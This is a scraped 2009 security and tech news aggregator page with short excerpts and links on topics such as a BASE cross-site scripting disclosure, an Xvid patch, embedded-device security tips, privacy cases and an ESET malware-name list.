Security Hero Rotating Header Image

May, 2009:

BASE – 3 Persistent Cross Site Scripting Vulnerabilities

BASE – 3 Persistent Cross Site Scripting Vulnerabilities

Posted by Jabra on May 30

BASE, a well known Snort Frontend has 3 Persistent Cross Site Scripting
Vulnerabilities.

For those who don’t know, Cross-Site Scripting allows the attacker to inject
Javascript to modify the functionality of the webpages. Since this
vulnerability exists in BASE, this allows an attacker to…

URL: http://seclists.org/fulldisclosure/2009/May/0278.html

Sprint’s CEO Rakes in $15.5M in Compensation

Sprints CEO Rakes in $15.5M in Compensation

Dan Hesse, CEO at Sprint-Nextel Corp. took home 30 percent bigger of a bonus for 2008 than expected, raking in $2.6 million. His overall compensation package came in at $15.5 million, with a base salary of $1.2 million.

Sprint shares have lost more than 70 percent of their value since the beginning of 2008.

It also lost 4.6 million customers during 2008, losing $2.8 billion, but Sprint spokesman James Fisher told the Wall Street Journal that the carrier has actually shown improvement, including cutting $1 billion in costs and renegotiating its credit positionXa position with which many analysts agree.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31544

Yet another company decides to get into the Mac cloning game

Yet another company decides to get into the Mac cloning game

Psystar has had a rather lackluster showing in its attempt to sell unauthorized Mac clonesXbesides Apple suing the pants off the company, Psystar has also filed for bankruptcy after just a year in existence. Now, a new company in Los Angeles hopes to somehow escape the wrath of Apple Legal byXget thisXopening a brick and mortar retail store. Quo Computer is set to open for business next Monday, June 1.

“It’s exciting. We are trying to stay as close to Apple as we can with our products,” Rashantha De Silva, Quo founder, told CNET. “We are trying to mimic things as much as we can. I’m hoping that Apple sees the value in what we are doing.”

Here in Orbiting HQ, we’re approximately 100 percent certain Apple will not see the value in a company that has the stated purpose of mimicking Apple’s hardware as closely as possible. There’s a word for trying to duplicate another company’s products as closely as possible and then trying to sell them: rip-off.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31543

Security update for Xvid

Security update for Xvid

The Xvid developers have released version 1.2.2 of their MPEG-4 codec to fix three security-related issues. One of the flaws reportedly prevents a function of the xvidcore library from checking the resync marker range correctly.

In its short announcement, Xvid Solutions do not mention whether the flaws can be exploited for injecting code via specially crafted videos. However, the developers highly recommend that users update. The update also offers various minor improvements, for example more precision for RGB-to-YUV colour conversions.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31542

CIS releases security configuration standards for iPhone

CIS releases security configuration standards for iPhone

The nonprofit Center for Internet Security (CIS) this week released free guidelines that can help organizations develop custom policies related to use of the increasingly popular mobile device, said Blake Frantz, CTO of the CIS. The benchmarks inform users about the security configuration settings available to them on the iPhone. For example, the standards explain how to make adjustments to protect data and deter potential attacks, such as disabling Bluetooth or JavaScript, or creating a strong password policy.

Frantz told SCMagazineUS.com on Friday that feedback from the CIS’ 150 members showed that there was a need for iPhone security standards. “It’s going to have your organization’s confidential information on it,” he said. “We want to equip organizations with some best practices that that information remains confidential.”

The guidance arrive at a time when businesses are facing increased pressure to manage their employees’ smartphones. A recent Osterman Research study, sponsored by Zenprise, provider of mobile management solutions, reported that the percentage of North American workers issued mobile devices by their employers will double from 23 percent last year to 46 percent in 2011. Other studies have said the number of iPhones in use in the enterprise will triple between now and 2011.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31541

New Travel Rules for High-Tech IDs Take Effect June 1

New Travel Rules for High-Tech IDs Take Effect June 1

New travel requirements go into effect June 1 at U.S. land and sea borders amid security concerns over an RFID-enabled passport card that has been approved for U.S. travelers.

The passport cards are being issued by the U.S. State Department under a program aimed at better securing U.S. borders against terrorist threats. Under the program, called the Western Hemisphere Travel Initiative (WHTI), U.S. citizens returning from Canada, Mexico, Bermuda, and the Caribbean by land or sea will be required to show a valid passport, the RFID-enabled passport or a WHTI-compliant driver’s license starting June 1. Currently, U.S. citizens can re-enter the country from these four regions with a driver’s license and proof of citizenship, such as a birth or naturalization certificate.

The passport cards, about 1 million of which have been issued so far, are designed to be a secure but cheaper alternative to regular passports. The card costs $45 for those 16 and older and $35 for those under 16. In contrast, a regular passport costs $100 for those over 16 and $85 for minors.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31540

The 5-step guide to fixing almost any PC problem

The 5-step guide to fixing almost any PC problem

Troubleshooting is curious skill. It’s part detective work, part methodical experimentation and part inspired guesswork, and part Zen Buddhism. That’s a lot of parts but you need them all to be able to sift through a list of symptoms, identify the fault, work out an appropriate remedy and not go barking mad in the process.

Knowing how computers work is also handy, but it isn’t enough by itself and it’s much less important than you may think, now that all human knowledge is just a Google search away. Knowing the answers is all very well but the real art is asking the right questions. See what I mean about the Zen?

So I’m not going to give you a fish. I’m not even going to teach you how to fish. I’m going to build you a stinking trawler. Theoretically this ought to put me out of a job but in practice, the well of human stupidity seems to replenish itself far faster than I can pump it out, so there’s no need to worry on my behalf.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31539

‘Pay With Facebook’ Is In The Wild

Pay With Facebook Is In The Wild

Earlier today, we wrote about Facebook updating its terms to get ready for the roll-out of its payment system. Well guess what, its already here.

The application GroupCard is currently testing the new payment system live for all accounts that have it installed. I included some screenshots below. Its very straightforward: Theres a big Pay With Facebook button, similar to the Facebook Connect buttons you see throughout the web. Next to that, there are the other options to pay with Visa, Mastercard, etc.

Clicking on the Pay With Facebook button pops open an overlay which asks you to confirm payment via your Facebook Credits. My $2.99 card cost me 30 Facebook Credits. Expect to see this roll out to other applications soon.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31538

Why Karma Matters

Microsoft Silverlight vs Google Wave: Why Karma Matters

Inevitable comparisons are made between the hugely enthusiastic developer response (including from us at Zoho) to Google Wave yesterday with the relatively tepid reponse to Microsoft’s new search engine Bing. The real interesting contrast to us, as independent software developers, is the way developers responded to Silverlight as opposed to the reaction yesterday to Google Wave. Both Silverlight and Wave are aimed at taking the internet experience to the next level. To be perfectly honest, Silverlight is a great piece of technology. Google Wave, as yet, is not much more than a concept and an announcement.

It is easy to dismiss all this with “Oh, the press just loves to hype everything Google, and loves to hate Microsoft,” but that cannot explain why even competitors like us are willing to embrace Google’s innovations, but stay away from perfectly good innovations from Microsoft, such as Silverlight?

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31537

Electronic messages never really private

Electronic messages never really private

Cell phones, instant messages and global positioning satellites are everywhere. But awareness that information sent over these devices is traceable doesn’t seem to be.

“I think people, in their lazy behavior, think they’re communicating one on one,” said John Donovan, a technology expert whose company, Telecom Visions Inc., is based in Garden City. “But there’s no real guarantee of privacy.”

And these devices can be instruments of undoing for those who run afoul of the law. That’s the case for Melissa Weber, 27, a teacher in Queens who was arraigned Friday on statutory rape charges stemming from her alleged sexual relationship with one of her 14-year-old students.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31536

An Avenue for Cyberterrorism?, (Sat, May 30th)

Embedded Devices: An Avenue for Cyberterrorism?, (Sat, May 30th)

There has been growing concern with the security of embedded devices as they continue to proliferate in several industries. This is caused by a confluence of several issues that makes for a difficult problem to solve.

First, these devices more and more rely on commodity operating systems (which carry with them commodity vulnerabilities and exploits). Second, there is a great deal of restriction with what consumers of these devices can do with them. Very often, you simply cant touch the operating system at all. Last, these devices tend to be notoriously difficult to update usually requiring the vendor to come out with a CD to reflash the device. Updates are few and far between, if updates are put in place at all.

The product is that this puts a device subject to a good subset of the same vulnerabilities that any workstation is but makes it very difficult to put it in the same patch rotation much less maintain and harden it. Ideally, these devices shouldnt be plugged into a network, but often they are. For instance, many embedded devices for SCADA and healthcare have reportedly been infected by Conficker (among others).

In those cases, they just got infected with commodity malware and behaved like your typical infected host. The scary part of this is, these devices can control very important things. Years ago, I would chafe at anyone using the word cyberterrorism. Terrorism has a specific definition that is a bit more restrictive than something bad. Its not terrorism unless widespread debilitating fear is involved.

However, now with embedded devices in hospitals, you have devices vulnerability to commodity exploits but the payload can be modified to do something bad with that devices functionality. In health care, for instance, if the device controls some life-saving or life-sustaining function, malware could have it intentionally cause harm. That would be an example of cyberterrorism. People would very quickly develop a fear of health care. So what can we do about it?

The real solution is that embedded device manufacturers need to provide updateability to these devices and ship them hardened. Barring that, here are some tips to help protect facilities that use these devices.

1) If they dont need to be on a network, take a Cat5 cable, cut off the RJ45 adapter and about an inch of cable and plug that into the port. Not only does this fill the gap, it makes people think twice before just plugging it in. Hang a note off the cable, if necessary.

2) If these devices have a unique vendor for the network card, use network access control to simply block all the MAC addresses for that vendor. For instance, MAC address AA:AA:AA:22:22:22 has a vendor portion of AA:AA:AA and the unique host portion is 22:22:22. So block AA:AA:AA:*.

3) If they absolutely must be networked, create an islanded network. In short, a network where there is no external facing components or totally isolated LAN.

4) Limit all access to the device via network, via USB or via Bluetooth. All these can be used as infection mechanisms.

What are your thoughts? Those of you using embedded devices or vendor black boxes, how are you securing them?

Cinema ordered to pay $10K in damages for search

Ca: Cinema ordered to pay $10K in damages for search

A Quebec court has ordered a cinema to pay $10,000 in damages after staff searched patrons’ bags and turned up smuggled snacks and birth control pills — and in the process violated their privacy rights.

Source – CTV.ca

via BoingBoing

Reddit It | Digg This | Add to del.icio.us

URL: http://www.pogowasright.org/article.php?story=20090530190741593

4117

4117

PDF/Exploit.Pidief.ONG, VBS/TrojanDownloader.Small.L (6), Win32/Adware.BHO.GBP (2), Win32/Adware.BHO.NCG (2), Win32/Adware.GooochiBiz (4), Win32/Adware.WSearch, Win32/Agent.NXT (2), Win32/AutoRun.Agent.NP, Win32/AutoRun.Delf.BY, Win32/Delf.PFS, Win32/FlyStudio.NML, Win32/FlyStudio.NMM (5), Win32/Hupigon, Win32/Hupigon.NPE, Win32/KillAV.NDV (2), Win32/Koutodoor.AF (3), Win32/Koutodoor.G, Win32/Peerfrag.AG, Win32/Poison.NBC (2), Win32/PSW.Agent.NLP (2), Win32/PSW.OnLineGames.NMP (2), Win32/PSW.OnLineGames.NMY (3), Win32/PSW.OnLineGames.NNM, Win32/PSW.OnLineGames.NSU (2), Win32/PSW.OnLineGames.OKE, Win32/PSW.WOW.DZI, Win32/PSWTool.MailPassView.151 (4), Win32/Rootkit.Agent.NLY, Win32/Rustock.NIH, Win32/Rustock.NIK (3), Win32/Spy.Banker.AFFJ, Win32/Spy.Banker.QLG (4), Win32/TrojanDownloader.Bredolab.AA (2), Win32/TrojanDownloader.FakeAlert.AAX, Win32/TrojanDownloader.FakeAlert.ABV, Win32/TrojanDownloader.FakeAlert.ACU, Win32/TrojanDownloader.FakeAlert.ACV (2), Win32/TrojanDownloader.Zlob.CZJ, Win32/TrojanDropperDelf.NNM (2), Win32/TrojanDropper.VB.NHZ (2), Win32/Wigon.KU (2), Win32/Wigon.KY

URL: http://www.eset.com/joomla/index.php?option=com_content&task=view&id=6089&Itemid=26

Threat Level Privacy, Crime and Security Online Obama Says Government Sanctions Unwarranted in Spy Case

Threat Level Privacy, Crime and Security Online Obama Says Government Sanctions Unwarranted in Spy Case

The Obama administration refused to budge late Friday and agree to reveal state secrets in a lawsuit weighing whether a sitting president may lawfully bypass Congress and spy on Americans without warrants as President George W. Bush did following the 2001 terror attacks.

In court briefs (pdf) filed at nearly midnight White House time, the Justice Department was responding to a federal judge’s week-old inquiry on whether the administration should be sanctioned for “failing to obey the court’s orders” in a key National Security Administration lawsuit. The government, as it has repeatedly, urged U.S. District Judge Vaughn Walker to allow the government to appeal his January 5 order requiring the government to develop a plan – a so-called “protective order” – that would pave the way to the release of state secrets to plaintiffs’ attorneys.

Source – Threat Level

Reddit It | Digg This | Add to del.icio.us

URL: http://www.pogowasright.org/article.php?story=20090530060930717

Is FFSpy a hoax?

Is FFSpy a hoax?

Posted by FFSpy Buster on May 30

Hi,

I have been watching the discussion on FFSpy since the last few weeks.
Duarte Silva, the author first posted it here: http://myf00.net/?p=18

He also believes that the addon mechanism of all software is flawed from
security standpoint. He says that while it is not much of a nuisance in

URL: http://seclists.org/fulldisclosure/2009/May/0271.html